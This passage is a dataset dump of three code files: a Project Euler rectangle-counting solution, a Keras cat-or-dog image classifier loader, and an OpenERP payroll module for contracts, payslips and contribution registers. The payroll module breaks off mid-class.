+{"seq_id":"412295369","text":"#!/usr/bin/env python3\n#Solution to Problem 85\nfrom time import time\nfrom math import fabs\n\ndef factorial(n):\n    f = 1\n    while n:\n        f *= n\n        n -= 1\n    return f\n\ndef choose(n,k):\n    return factorial(n)//(factorial(k)*factorial(n-k))\n\ndef starsbars(n,k):\n    return choose(n+k-1,k)\n\ndef rects(w,h):\n    \"\"\"For a rectangle's height and width, the number of rectangles\n    is just the number of ways we can drop two vertical line marbles\n    into h buckets * the number of ways we can drop two horizontal\n    line marbles into w buckets.\"\"\"\n    return starsbars(w,2)*starsbars(h,2)\n\nclosest = 0\ntarget = 2000000\nstart = time()\nx,y = 0,0\nfor w in range(1,1000): #Limits found by trial and error\n    for h in range(w,1000):\n        test = rects(w,h)\n        if fabs(target-test) < fabs(target-closest):\n            closest = test\n            x,y = w,h\n        if test > target:\n            break\nprint(\"{}x{} = {} : {}\".format(x,y,x*y,closest))\nprint(\"Time: {}s\".format(time()-start))\n","sub_path":"e85.py","file_name":"e85.py","file_ext":"py","file_size_in_byte":995,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"}
+{"seq_id":"436095458","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Jun 28 14:37:18 2018\n\n@author: admin\n\"\"\"\n\nfrom keras.models import model_from_json\njson_file = open('model.json','r')\nloaded_model_json = json_file.read()\njson_file.close()\nloaded_model = model_from_json(loaded_model_json)\nloaded_model.load_weights(\"model.h5\")\nprint(\"Loaded Model from disk\")\nloaded_model.compile(loss='categorical_crossentropy', optimizer='adam',metrics=['accuracy'])\n#loaded_model.predict()\n\nfrom keras.preprocessing import image\nimport numpy as np\ntest_image = image.load_img('dataset/sample1.jpg', target_size = (64, 64))\ntest_image = image.img_to_array(test_image)\ntest_image = np.expand_dims(test_image, axis = 0)\nresult = loaded_model.predict(test_image)\nif result[0][0] == 1:\n    prediction = 'dog'\nelse:\n    prediction = 'cat'\nprint(prediction)\n","sub_path":"aiml/loadingCNN.py","file_name":"loadingCNN.py","file_ext":"py","file_size_in_byte":837,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"}
+{"seq_id":"479562546","text":"# -*- encoding: utf-8 -*-\n##############################################################################\n#\n#    OpenERP, Open Source Management Solution\n#    Copyright (C) 2004-2010 Tiny SPRL ().\n#\n#    Thinkopen - Portugal & Brasil\n#    
Copyright (C) Thinkopen Solutions ().\n#\n# This program is free software: you can redistribute it and/or modify\n# it under the terms of the GNU Affero General Public License as\n# published by the Free Software Foundation, either version 3 of the\n# License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU Affero General Public License for more details.\n#\n# You should have received a copy of the GNU Affero General Public License\n# along with this program. If not, see .\n#\n##############################################################################\n\nimport time\nfrom openerp import netsvc\nfrom openerp import tools\nfrom openerp.tools.translate import _\nfrom openerp.osv import fields, osv\nfrom datetime import date\nfrom datetime import datetime\nfrom datetime import timedelta\nfrom dateutil import relativedelta\nfrom math import modf\nimport openerp.addons.decimal_precision as dp\n\n_Months_List_trans = {'01':'Janeiro',\n '02':'Fevereiro',\n '03':'Março',\n '04':'Abril',\n '05':'Maio',\n '06':'Junho', \n '07':'Julho', \n '08':'Agosto', \n '09':'Setembro',\n '10':'Outubro',\n '11':'Novembro', \n '12':'Dezembro'}\n\n_Months_List = [('01','January'), ('02','February'), ('03','March'), ('04','April'),\n ('05','May'), ('06','June'), ('07','July'), ('08','August'), ('09','September'),\n ('10','October'), ('11','November'), ('12','December')]\n\nclass hr_contract(osv.osv):\n \"\"\"\n Employee contract based on the visa, work permits\n allows to configure different Salary structure\n \"\"\"\n \n _history_vals_log = [{'wage':'Salario'}]\n\n _inherit = 'hr.contract'\n _name='hr.contract'\n _description = 'Employee Contract'\n \n def write(self, cr, uid, ids, vals, context=None):\n hr_employee_obj = self.pool.get('hr.employee')\n ir_model_obj = self.pool.get('ir.model')\n model_obj_id = ir_model_obj.search(cr, uid, [('model','=','hr.contract')])\n if context is None:\n context = {}\n for line in self.browse(cr, uid, ids):\n for value in vals:\n previous_value = self.read(cr, uid, line.id, [value])[value]\n if not any(d.has_key(value) for d in self._history_vals_log):\n continue\n index = next(index for (index, d) in enumerate(self._history_vals_log) if d.has_key(value))\n object = self._history_vals_log[index][value]\n change = '%s - Referencia contrato %s' % (vals[value], line.name)\n hr_employee_obj.write_history_line(cr, uid, ids, line.employee_id.id, model_obj_id[0], value, object, previous_value, change, context)\n super(hr_contract, self).write(cr, uid, ids, vals, context=context)\n return True\n\n _columns = {\n 'permit_no': fields.char('Work Permit No', size=256, required=False, readonly=False),\n 'visa_no': fields.char('Visa No', size=64, required=False, readonly=False),\n 'visa_expire': fields.date('Visa Expire Date'),\n 'insurance_name': fields.char('Insurance', size=256, required=False, readonly=False),\n 'insurance_no': fields.char('Insurance No', size=256, required=False, readonly=False),\n #'meal_option': fields.selection([('cash','Cash'),('coupons', 'Meal Coupons')], 'Meal Option'),\n 'working_hours': fields.many2one('resource.calendar','Working Schedule', required=True),\n 'month_vacation': fields.selection(_Months_List, \"Month Vacation\"),\n 'month_christmas': fields.selection(_Months_List, \"Month Vacation Christmas\"),\n 'day_meal': fields.float(\"Day Meal Value\", 
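The `write` override above walks `_history_vals_log` (a list of single-key dicts mapping a field name to its human label) to decide which changed fields deserve an audit entry before delegating to `super`. A standalone sketch of that lookup, with the hypothetical `log_spec` and `changes` names standing in for the ORM plumbing (note `d.has_key(k)` is Python 2 only; `k in d` works everywhere):

```python
log_spec = [{'wage': 'Salario'}]  # mirrors _history_vals_log

def tracked_changes(changes):
    """Yield (field, label, new_value) for every tracked field in changes."""
    for field, new_value in changes.items():
        if not any(field in d for d in log_spec):
            continue  # field is not tracked, nothing to log
        label = next(d for d in log_spec if field in d)[field]
        yield field, label, new_value

print(list(tracked_changes({'wage': 1200, 'visa_no': 'X1'})))
# [('wage', 'Salario', 1200)]
```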
digits_compute=dp.get_precision('Payroll')),\n\n }\nhr_contract()\n\n\n\nclass hr_payslip_run(osv.osv):\n _inherit = 'hr.payslip.run'\n \n def final_verify_sheet(self, cr, uid, ids, context=None):\n \"\"\"\n JMG: New method to calculate the payment advice lines\n \"\"\"\n slip_pool = self.pool.get('hr.payslip')\n advice_pool = self.pool.get('hr.payroll.advice')\n advice_line_pool = self.pool.get('hr.payroll.advice.line')\n sequence_pool = self.pool.get('ir.sequence')\n users_pool = self.pool.get('res.users')\n banks = []\n comp_acc = {}\n advice_lines = { }\n company = users_pool.browse(cr, uid, uid, context=context).company_id\n for reg in self.browse(cr, uid, ids, context=context):\n if not company.bank_ids:\n raise osv.except_osv(_('Error !'), _('No bank(s) defined in %s') % (company.name))\n # get all company banks\n for acc_bank in company.bank_ids:\n banks.append(acc_bank.bank.id)\n advice_lines[acc_bank.bank.id] = []\n comp_acc[acc_bank.bank.id] = acc_bank.id \n for slip in reg.slip_ids:\n if not slip.employee_id.bank_account_id.acc_number:\n raise osv.except_osv(_('Error !'), _('Please define bank account for the %s employee') % (slip.employee_id.name))\n if not slip.employee_id.bank_account_id.bank.id in banks:\n raise osv.except_osv(_('Error !'), _('Sem banco na empresa para o funcionário %s ') % (slip.employee_id.name))\n value_net = [x.amount for x in slip.line_ids if\n #x.slip_id.state == 'done' and \n x.salary_rule_id.category_id.code in ('NET')\n ]\n if not value_net:\n raise osv.except_osv(_('Error !'), _('Amount invalid for the %s employee. Category \"NET\" missing in payslip.') % (slip.employee_id.name))\n \n advice_lines[slip.employee_id.bank_account_id.bank.id].append({\n 'name':slip.employee_id.bank_account_id.acc_number,\n 'employee_id':slip.employee_id.id,\n 'amount':value_net[0],\n #'bysal':slip.net\n })\n for advice in advice_lines.iterkeys():\n if advice_lines[advice]:\n pid = advice_pool.create(cr,uid,{\n 'name': 'Payment Advice %s' % (company.name),\n# 'number': sequence_pool.get(cr, uid, 'payment.advice'),\n 'register_id':reg.id,\n 'bank_id' : comp_acc[advice],\n 'compute_date': date(int(reg.date_start.split('-')[0]),int(reg.date_start.split('-')[1]), 1) ,\n }, context=context)\n for line in advice_lines[advice]:\n lid =advice_line_pool.create(cr,uid,line,context=context)\n advice_line_pool.write(cr,uid,[lid],{'advice_id' : pid})\n return True\n \n def close_payslip_run(self, cr, uid, ids, context=None):\n wf_service = netsvc.LocalService('workflow')\n self.final_verify_sheet(cr, uid, ids, context)\n # Validate all slips in draft associated \n for run in self.browse(cr, uid, ids):\n for slip in run.slip_ids: \n if slip.state not in ('draft'):\n continue\n #wf_service.trg_validate(uid, 'hr.payslip', slip.id, 'hr_verify_sheet', cr)\n res = super(hr_payslip_run, self).close_payslip_run(cr, uid, ids, context)\n return res \n\nclass hr_payslip(osv.osv):\n '''\n Pay Slip\n '''\n\n _name = 'hr.payslip'\n _inherit = 'hr.payslip'\n _order = 'number desc'\n _columns = {\n 'adhoc_rules': fields.many2many('hr.salary.rule', 'rule_adhoc_payslip', 'rule_id', 'payslip_id', 'Ad-hoc Rules', readonly=True, states={'draft': [('readonly', False)]}),\n }\n \n def cancel_sheet(self, cr, uid, ids, context=None):\n register_line_pool = self.pool.get('hr.contribution.register.line')\n #advance_pool = self.pool.get('')\n for slip in self.browse(cr, uid, ids, context=context):\n register_line_pool.unlink(cr,uid,register_line_pool.search(cr,uid,[('payslip_id','=',slip.id)]))\n return 
super(hr_payslip, self).cancel_sheet(cr, uid, ids, context=context)\n \n def draft(self, cr, uid, ids, context=None):\n \n return self.write(cr, uid, ids, {'state':'draft'}, context=context)\n \n #to add our own ad-hoc rules\n def get_extra_rules(self, cr, uid, payslip_id, context):\n payslip_obj = self.pool.get('hr.payslip')\n slip = payslip_obj.browse(cr, uid, payslip_id, context=context)\n return slip.adhoc_rules\n \n def process_input_lines(self, cr, uid, input_line_ids):\n pool = self.pool.get('hr.payslip.input')\n codes = set()\n for state, id, vals in input_line_ids:\n if state == 0:\n codes.add(vals['code'])\n elif state == 4:\n [input] = pool.browse(cr, uid, [id])\n codes.add(input.code)\n return codes\n \n def onchange_adhoc_rules(self, cr, uid, ids, contract_id, adhoc_rules, input_line_ids):\n if not contract_id:\n raise osv.except_osv(_(\"Error\"), _(\"You must select a contract first\"))\n rules_pool = self.pool.get('hr.salary.rule')\n codes = self.process_input_lines(cr, uid, input_line_ids)\n # unpack the (6, 0, ids) command sent by the many2many widget\n [[_, _, rule_ids]] = adhoc_rules\n for rule in rules_pool.browse(cr, uid, rule_ids):\n if rule.input_ids:\n for input in rule.input_ids:\n if input.code not in codes:\n input_line_ids.append( (0, False, {\n 'name': input.name,\n 'code': input.code,\n 'contract_id': contract_id,\n } ) )\n \n return {'value': {'input_line_ids': input_line_ids}}\n \n\n def get_payment_advance(self, cr, uid, from_date, to_date, employee_id):\n return 0.0\n\n def get_payslip_lines(self, cr, uid, contract_ids, payslip_id, lock_dict,context):\n \"\"\"\n Inherit method to round amount of tax salary rule = DIR\n \"\"\"\n def _sum_salary_rule_category(localdict, category, amount):\n if category.parent_id:\n localdict = _sum_salary_rule_category(localdict, category.parent_id, amount)\n localdict['categories'].dict[category.code] = category.code in localdict['categories'].dict and localdict['categories'].dict[category.code] + amount or amount\n return localdict\n\n class BrowsableObject(object):\n def __init__(self, pool, cr, uid, employee_id, dict):\n self.pool = pool\n self.cr = cr\n self.uid = uid\n self.employee_id = employee_id\n self.dict = dict\n\n def __getattr__(self, attr):\n return attr in self.dict and self.dict.__getitem__(attr) or 0.0\n\n class InputLine(BrowsableObject):\n \"\"\"a class that will be used in the python code, mainly for usability purposes\"\"\"\n def sum(self, code, from_date, to_date=None):\n if to_date is None:\n to_date = datetime.now().strftime('%Y-%m-%d')\n result = 0.0\n self.cr.execute(\"SELECT sum(amount) as sum\\\n FROM hr_payslip as hp, hr_payslip_input as pi \\\n WHERE hp.employee_id = %s AND hp.state = 'done' \\\n AND hp.date_from >= %s AND hp.date_to <= %s AND hp.id = pi.payslip_id AND pi.code = %s\",\n (self.employee_id, from_date, to_date, code))\n res = self.cr.fetchone()[0]\n return res or 0.0\n\n class WorkedDays(BrowsableObject):\n \"\"\"a class that will be used in the python code, mainly for usability purposes\"\"\"\n def _sum(self, code, from_date, to_date=None):\n if to_date is None:\n to_date = datetime.now().strftime('%Y-%m-%d')\n result = 0.0\n self.cr.execute(\"SELECT sum(number_of_days) as number_of_days, sum(number_of_hours) as number_of_hours\\\n FROM hr_payslip as hp, hr_payslip_worked_days as pi \\\n WHERE hp.employee_id = %s AND hp.state = 'done'\\\n AND hp.date_from >= %s AND hp.date_to <= %s AND hp.id = pi.payslip_id AND pi.code = %s\",\n (self.employee_id, from_date, to_date, code))\n return self.cr.fetchone()\n\n def sum(self, code, 
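`process_input_lines` above dispatches on the numeric command codes that OpenERP uses inside x2many value lists: state 0 means "create a record from these values" and state 4 means "link an existing record". For reference, the commonly used commands (the method only handles the first and the fifth):

```python
# OpenERP/Odoo x2many command tuples:
#   (0, 0, values)   create a new record from values
#   (1, id, values)  update existing record id with values
#   (2, id, _)       delete record id
#   (3, id, _)       unlink record id (keep it in the database)
#   (4, id, _)       link the existing record id
#   (5, _, _)        unlink all records
#   (6, 0, ids)      replace the whole set with ids
input_line_ids = [
    (0, False, {'code': 'MEAL', 'name': 'Meal allowance'}),  # state == 0
    (4, 42, False),                                          # state == 4
]
```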
from_date, to_date=None):\n res = self._sum(code, from_date, to_date)\n return res and res[0] or 0.0\n\n def sum_hours(self, code, from_date, to_date=None):\n res = self._sum(code, from_date, to_date)\n return res and res[1] or 0.0\n \n \n\n class Payslips(BrowsableObject):\n \"\"\"a class that will be used into the python code, mainly for usability purposes\"\"\"\n\n def sum(self, code, from_date, to_date=None):\n if to_date is None:\n to_date = datetime.now().strftime('%Y-%m-%d')\n self.cr.execute(\"SELECT sum(case when hp.credit_note = False then (pl.total) else (-pl.total) end)\\\n FROM hr_payslip as hp, hr_payslip_line as pl \\\n WHERE hp.employee_id = %s AND hp.state = 'done' \\\n AND hp.date_from >= %s AND hp.date_to <= %s AND hp.id = pl.slip_id AND pl.code = %s\",\n (self.employee_id, from_date, to_date, code))\n res = self.cr.fetchone()\n return res and res[0] or 0.0\n \n def extrahours(self,from_date,to_date=None):\n if to_date is None:\n to_date = datetime.now().strftime('%Y-%m-%d')\n self.cr.execute(\"SELECT sum(case when hao.overtime > 2 then 2 else hao.overtime end) \\\n FROM hr_attendance_overtime hao \\\n WHERE hao.employee_id = %s AND hao.state = 'confirmed' \\\n AND hao.overtime_date >= %s AND hao.overtime_date <= %s \",\n (self.employee_id, from_date, to_date))\n res = self.cr.fetchone()\n return res and res[0] or 0\n \n def get_due_payment(self, from_date, to_date=None):\n value = self.pool.get('hr.payslip').get_payment_advance(cr, uid, from_date, to_date, self.employee_id)\n return value and value or 0.0\n #we keep a dict with the result because a value can be overwritten by another rule with the same code\n result_dict = {}\n rules = {}\n categories_dict = {}\n blacklist = []\n payslip_obj = self.pool.get('hr.payslip')\n inputs_obj = self.pool.get('hr.payslip.worked_days')\n obj_rule = self.pool.get('hr.salary.rule')\n payslip = payslip_obj.browse(cr, uid, payslip_id, context=context)\n worked_days = {}\n for worked_days_line in payslip.worked_days_line_ids:\n worked_days[worked_days_line.code] = worked_days_line\n inputs = {}\n for input_line in payslip.input_line_ids:\n inputs[input_line.code] = input_line\n\n categories_obj = BrowsableObject(self.pool, cr, uid, payslip.employee_id.id, categories_dict)\n input_obj = InputLine(self.pool, cr, uid, payslip.employee_id.id, inputs)\n worked_days_obj = WorkedDays(self.pool, cr, uid, payslip.employee_id.id, worked_days)\n payslip_obj = Payslips(self.pool, cr, uid, payslip.employee_id.id, payslip)\n rules_obj = BrowsableObject(self.pool, cr, uid, payslip.employee_id.id, rules)\n\n localdict = {'categories': categories_obj, 'rules': rules_obj, 'payslip': payslip_obj, 'worked_days': worked_days_obj, 'inputs': input_obj}\n #get the ids of the structures on the contracts and their parent id as well\n structure_ids = self.pool.get('hr.contract').get_all_structures(cr, uid, contract_ids, context=context)\n #get the rules of the structure and thier children\n rule_ids = self.pool.get('hr.payroll.structure').get_all_rules(cr, uid, structure_ids, context=context)\n \n # TKO: adding adhoc rules with permission of group_adhoc_rules\n group_adhoc_rules_id = self.pool.get('ir.model.data').get_object_reference(cr, uid, 'tkao_hr_ao', 'group_adhoc_rules')[1]\n group_adhoc_rules = self.pool.get('res.groups').browse(cr, uid, group_adhoc_rules_id, context=context)\n if group_adhoc_rules and uid in [x.id for x in group_adhoc_rules.users]:\n rules_ad_hoc = self.get_extra_rules(cr, uid, payslip_id, context=context)\n rule_ids += 
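`BrowsableObject` (defined a few lines up) is what lets the salary-rule Python snippets write `categories.GROSS` or `inputs.MEAL` and silently read `0.0` when the key is missing, instead of raising. The trick is `__getattr__`, which Python only consults after normal attribute lookup fails; a minimal standalone sketch:

```python
class Browsable(object):
    def __init__(self, values):
        self.values = values

    def __getattr__(self, name):
        # Only called when normal lookup fails, so self.values is safe here.
        return self.values.get(name, 0.0)

cats = Browsable({'GROSS': 2500.0})
print(cats.GROSS)  # 2500.0
print(cats.ALW)    # 0.0 -- absent categories read as zero in rule code
```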
obj_rule._recursive_search_of_rules(cr, uid, rules_ad_hoc, context=context)\n \n #run the rules by sequence\n sorted_rule_ids = [id for id, sequence in sorted(rule_ids, key=lambda x:x[1])]\n\n for contract in self.pool.get('hr.contract').browse(cr, uid, contract_ids, context=context):\n employee = contract.employee_id\n localdict.update({'employee': employee, 'contract': contract})\n for rule in obj_rule.browse(cr, uid, sorted_rule_ids, context=context):\n key = rule.code + '-' + str(contract.id)\n localdict['result'] = None\n localdict['result_qty'] = 1.0\n lock = False\n #check if the rule can be applied\n if obj_rule.satisfy_condition(cr, uid, rule.id, localdict, context=context) and rule.id not in blacklist:\n #compute the amount of the rule\n amount, qty, rate = obj_rule.compute_rule(cr, uid, rule.id, localdict, context=context)\n #check if there is already a rule computed with that code\n previous_amount = rule.code in localdict and localdict[rule.code] or 0.0\n # If user locked amount for rule, replace amount\n if rule.code in lock_dict:\n #tot_rule = lock_dict[rule.code]\n amount = lock_dict[rule.code] \n lock = True\n #set/overwrite the amount computed for this rule in the localdict\n tot_rule = amount * qty * rate / 100.0\n # if rule is a tax deduction, round to the lowest number\n if rule.code == 'DIR':\n rest, tot_rule = modf(tot_rule)\n localdict[rule.code] = tot_rule\n rules[rule.code] = rule\n #sum the amount for its salary category\n localdict = _sum_salary_rule_category(localdict, rule.category_id, tot_rule - previous_amount)\n #create/overwrite the rule in the temporary results\n result_dict[key] = {\n 'salary_rule_id': rule.id,\n 'contract_id': contract.id,\n 'name': rule.name,\n 'code': rule.code,\n 'category_id': rule.category_id.id,\n 'sequence': rule.sequence,\n 'appears_on_payslip': rule.appears_on_payslip,\n 'condition_select': rule.condition_select,\n 'condition_python': rule.condition_python,\n 'condition_range': rule.condition_range,\n 'condition_range_min': rule.condition_range_min,\n 'condition_range_max': rule.condition_range_max,\n 'amount_select': rule.amount_select,\n 'amount_fix': rule.amount_fix,\n 'amount_python_compute': rule.amount_python_compute,\n 'amount_percentage': rule.amount_percentage,\n 'amount_percentage_base': rule.amount_percentage_base,\n 'register_id': rule.register_id.id,\n 'amount': amount,\n 'employee_id': contract.employee_id.id,\n 'quantity': qty,\n 'rate': rate,\n 'lock' : lock,\n }\n else:\n #blacklist this rule and its children\n blacklist += [id for id, seq in self.pool.get('hr.salary.rule')._recursive_search_of_rules(cr, uid, [rule], context=context)]\n\n result = [value for code, value in result_dict.items()]\n return result\n \n def get_worked_day_lines(self, cr, uid, contract_ids, date_from, date_to, context=None):\n \"\"\"\n Overwriten method to map the code of employee leave and count also weekends in normal working days\n \"\"\"\n def was_on_leave(employee_id, datetime_day, context=None):\n res = False\n day = datetime_day.strftime(\"%Y-%m-%d\")\n holiday_ids = self.pool.get('hr.holidays').search(cr, uid, [('state','in',('validate','complete')),('employee_id','=',employee_id),('number_of_days','<',0),('date_from','<=',day),('date_to','>=',day)])\n if holiday_ids:\n # TKO: Map leave code \n res = { \n 'leave_type':self.pool.get('hr.holidays').browse(cr, uid, holiday_ids, context=context)[0].holiday_status_id.name,\n 'leave_code':self.pool.get('hr.holidays').browse(cr, uid, holiday_ids, 
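`math.modf` splits a float into its fractional and integral parts (both floats, both carrying the sign of the input), so the `rest, tot_rule = modf(tot_rule)` line above truncates the DIR tax amount toward zero rather than rounding it:

```python
from math import modf

frac, whole = modf(1234.87)
print(frac, whole)   # ~0.87 1234.0 -- the payslip keeps 1234.0

# Both parts keep the sign, so a negative amount truncates toward zero:
print(modf(-50.4))   # (-0.4, -50.0), not -51.0
```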
context=context)[0].holiday_status_id.code,\n }\n return res\n\n res = []\n for contract in self.pool.get('hr.contract').browse(cr, uid, contract_ids, context=context):\n if not contract.working_hours:\n #fill only if the contract as a working schedule linked\n continue\n attendances = {\n 'name': (\"Normal Working Days paid at 100%\"),\n# 'name': (\"Dias trabalhados\"),\n 'sequence': 1,\n 'code': 'WORK100',\n 'number_of_days': 0.0,\n 'number_of_hours': 0.0,\n 'contract_id': contract.id,\n }\n leaves = {}\n day_from = datetime.strptime(date_from,\"%Y-%m-%d\")\n day_to = datetime.strptime(date_to,\"%Y-%m-%d\")\n nb_of_days = (day_to - day_from).days + 1\n for day in range(0, nb_of_days):\n working_hours_on_day = self.pool.get('resource.calendar').working_hours_on_day(cr, uid, contract.working_hours, day_from + timedelta(days=day), context)\n if working_hours_on_day:\n #the employee had to work\n leave_type = was_on_leave(contract.employee_id.id, day_from + timedelta(days=day), context=context)\n if leave_type:\n #if he was on leave, fill the leaves dict\n if leave_type['leave_type'] in leaves:\n leaves[leave_type['leave_type']]['number_of_days'] += 1.0\n leaves[leave_type['leave_type']]['number_of_hours'] += working_hours_on_day\n else:\n leaves[leave_type['leave_type']] = {\n 'name': leave_type['leave_type'],\n 'sequence': 5,\n 'code': leave_type['leave_code'],\n 'number_of_days': 1.0,\n 'number_of_hours': working_hours_on_day,\n 'contract_id': contract.id,\n }\n else:\n #add the input vals to tmp (increment if existing)\n attendances['number_of_days'] += 1.0\n attendances['number_of_hours'] += working_hours_on_day\n # TKO: Extra condition to count also weekends\n else:\n leave_type = was_on_leave(contract.employee_id.id, day_from + timedelta(days=day), context=context)\n if leave_type:\n if leave_type['leave_type'] in leaves:\n leaves[leave_type['leave_type']]['number_of_days'] += 1.0\n leaves[leave_type['leave_type']]['number_of_hours'] += leaves[leave_type['leave_type']]['number_of_hours'] / (leaves[leave_type['leave_type']]['number_of_days'] -1)\n leaves = [value for key,value in leaves.items()]\n res += [attendances] + leaves\n return res\n \n def hr_verify_sheet(self, cr, uid, ids, context=None):\n \"\"\"\n This method inherit verify sheet from HR to compute contribution register lines \n \"\"\"\n wf_service = netsvc.LocalService(\"workflow\")\n # TKO: Compute contribution register lines\n result = super(hr_payslip, self).hr_verify_sheet(cr, uid, ids, context)\n register_line_pool = self.pool.get('hr.contribution.register.line')\n register_pool = self.pool.get('hr.contribution.register')\n for slip in self.browse(cr, uid, ids, context=context):\n for line in slip.line_ids:\n if line.salary_rule_id.register_id:\n company_contrib = register_pool.compute(cr, uid, line.salary_rule_id.register_id, slip, slip.contract_id, context)\n reg_line = {\n 'name':line.name,\n 'register_id': line.salary_rule_id.register_id.id,\n 'payslip_id' : slip.id,\n 'code':line.salary_rule_id.code,\n 'employee_id':slip.employee_id.id,\n 'emp_deduction':line.total * -1,\n 'comp_deduction':company_contrib,\n 'total':line.total + line.total\n }\n register_line_pool.create(cr, uid, reg_line)\n #wf_service.trg_validate(uid, 'hr.payslip', slip.id, 'hr_verify_sheet', cr)\n #self.write(cr,uid,ids,{'state':'verify'},context=context) \n wf_service.trg_validate(uid, 'hr.payslip', slip.id, 'hr_verify_sheet', cr)\n return result\n def compute_sheet(self, cr, uid, ids, context=None):\n slip_line_pool = 
self.pool.get('hr.payslip.line')\n sequence_obj = self.pool.get('ir.sequence')\n lock_dict = {}\n for payslip in self.browse(cr, uid, ids, context=context):\n number = payslip.number or sequence_obj.get(cr, uid, 'salary.slip')\n #delete old payslip lines\n old_slipline_ids = slip_line_pool.search(cr, uid, [('slip_id', '=', payslip.id)], context=context)\n# old_slipline_ids\n for old_line in slip_line_pool.browse(cr,uid,old_slipline_ids):\n if old_line.lock:\n if old_line.salary_rule_id.protect_lock:\n raise osv.except_osv(_('Error !'), _('A rubrica %s esta protegida não pode alterar este valor') % (old_line.name))\n \n lock_dict[old_line.code] = old_line.amount\n slip_line_pool.unlink(cr, uid, old_line.id, context=context)\n if payslip.contract_id:\n #set the list of contract for which the rules have to be applied\n contract_ids = [payslip.contract_id.id]\n else:\n #if we don't give the contract, then the rules to apply should be for all current contracts of the employee\n contract_ids = self.get_contract(cr, uid, payslip.employee_id, payslip.date_from, payslip.date_to, context=context)\n lines = [(0,0,line) for line in self.get_payslip_lines(cr, uid, contract_ids, payslip.id,lock_dict, context=context)]\n self.write(cr, uid, [payslip.id], {'line_ids': lines, 'number': number,}, context=context)\n return True\nclass hr_payslip_line(osv.osv):\n _name = 'hr.payslip.line'\n _inherit = 'hr.payslip.line'\n \n def _calculate_total(self, cr, uid, ids, name, args, context):\n \"\"\"\n Inherit method from HR Payroll to \n \"\"\"\n res = super(hr_payslip_line, self)._calculate_total(cr, uid, ids, name, args, context)\n for k,v in res.items():\n rule = self.browse(cr, uid, k)\n if rule and rule.code == 'DIR':\n ress, amount = modf(v)\n res[k] = amount\n return res\n \n _columns = {\n 'total': fields.function(_calculate_total, method=True, type='float', string='Total', digits_compute=dp.get_precision('Payroll'),store=True ),\n 'lock' :fields.boolean('Lock line'),\n\n }\n\nhr_payslip_line()\n\n \n#New class to compute the values of company contributions\nclass contrib_register(osv.osv):\n _name = 'hr.contribution.register'\n _inherit = 'hr.contribution.register'\n \n def _total_contrib(self, cr, uid, ids, field_names, arg, context=None):\n line_pool = self.pool.get('hr.contribution.register.line')\n\n res = {}\n for cur in self.browse(cr, uid, ids, context=context):\n current = line_pool.search(cr, uid, [('register_id','=',cur.id)], context=context)\n e_month = 0.0\n c_month = 0.0\n for i in line_pool.browse(cr, uid, current, context=context):\n e_month += i.emp_deduction\n c_month += i.comp_deduction\n res[cur.id]={\n 'monthly_total_by_emp':e_month,\n 'monthly_total_by_comp':c_month,\n }\n return res\n \n _columns = {\n 'line_ids':fields.one2many('hr.contribution.register.line', 'register_id', 'Register Line', readonly=True),\n 'monthly_total_by_emp': fields.function(_total_contrib, method=True, multi='dc', string='Total By Employee', digits=(16, 2)),\n 'monthly_total_by_comp': fields.function(_total_contrib, method=True, multi='dc', string='Total By Company', digits=(16, 2)),\n 'code':fields.char('Code', size=64, required=True, readonly=False),\n 'rule_id':fields.many2one('hr.salary.rule', 'Salary Rule', required=False),\n 'active':fields.boolean('Active', required=False),\n 'note': fields.text('Description'),\n }\n _defaults ={\n 'active': lambda *a:True,\n }\n \n def compute(self, cr, uid, register_id, slip, contract_id, context=None):\n '''\n Compute Register Lines based on salary rules\n '''\n 
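The `lock_dict` round-trip in `compute_sheet` above is the manual-override mechanism: before the old lines are deleted, the amounts of lines flagged `lock` are remembered by rule code (unless the rule is `protect_lock`, which raises), and `get_payslip_lines` then substitutes those amounts for the freshly computed ones. Stripped of the ORM, the flow is:

```python
old_lines = [
    {'code': 'BASIC', 'amount': 1000.0, 'lock': False},
    {'code': 'ALW',   'amount':  250.0, 'lock': True},  # user-edited line
]

# 1. remember locked amounts before wiping the old lines
lock_dict = {l['code']: l['amount'] for l in old_lines if l['lock']}

# 2. during recomputation a locked code keeps the remembered amount
def amount_for(code, fresh, lock_dict):
    return lock_dict.get(code, fresh)

print(amount_for('BASIC', 1100.0, lock_dict))  # 1100.0 -- recomputed
print(amount_for('ALW', 300.0, lock_dict))     # 250.0  -- override kept
```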
obj_rule = self.pool.get('hr.salary.rule')\n blacklist = []\n localdict = {'result': None, 'result_qty': 1.0}\n employee = contract_id.employee_id\n tot_rule= 0.0\n localdict.update({'employee': employee, 'contract': contract_id})\n #check if the rule can be applied\n if register_id.rule_id and obj_rule.satisfy_condition(cr, uid, register_id.rule_id.id, localdict, context=context) and register_id.rule_id.id not in blacklist:\n #compute the amount of the rule\n amount, qty, rate = obj_rule.compute_rule(cr, uid, register_id.rule_id.id, localdict, context=context)\n #set/overwrite the amount computed for this rule in the localdict\n tot_rule = amount * qty * rate / 100.0\n else:\n #blacklist this rule and its children\n blacklist += [id for id, seq in self.pool.get('hr.salary.rule')._recursive_search_of_rules(cr, uid, [register_id.rule_id], context=context)]\n return tot_rule\n\n\nclass contrib_register_line(osv.osv):\n '''\n Contribution Register Line\n Allows the computation from company contribution for some taxes\n '''\n\n _name = 'hr.contribution.register.line'\n _description = 'Contribution Register Line'\n\n def _total(self, cr, uid, ids, field_names, arg, context=None):\n res={}\n for line in self.browse(cr, uid, ids, context=context):\n res[line.id] = line.emp_deduction + line.comp_deduction\n return res\n\n _columns = {\n 'name':fields.char('Name', size=256, required=True, readonly=False),\n 'register_id':fields.many2one('hr.contribution.register', 'Register', required=False),\n 'payslip_id' : fields.many2one('hr.payslip','Payslip'),\n 'code':fields.char('Code', size=64, required=False, readonly=False),\n 'employee_id':fields.many2one('hr.employee', 'Employee', required=True),\n 'date': fields.date('Date'),\n 'emp_deduction': fields.float('Employee Deduction', digits=(16, 2)),\n 'comp_deduction': fields.float('Company Deduction', digits=(16, 2)),\n 'total': fields.function(_total, method=True, store=True, string='Total', digits=(16, 2)),\n }\n _defaults = {\n 'date': lambda *a: time.strftime('%Y-%m-%d'),\n }\n\nclass hr_salary_rule(osv.osv):\n _name = \"hr.salary.rule\"\n _inherit = 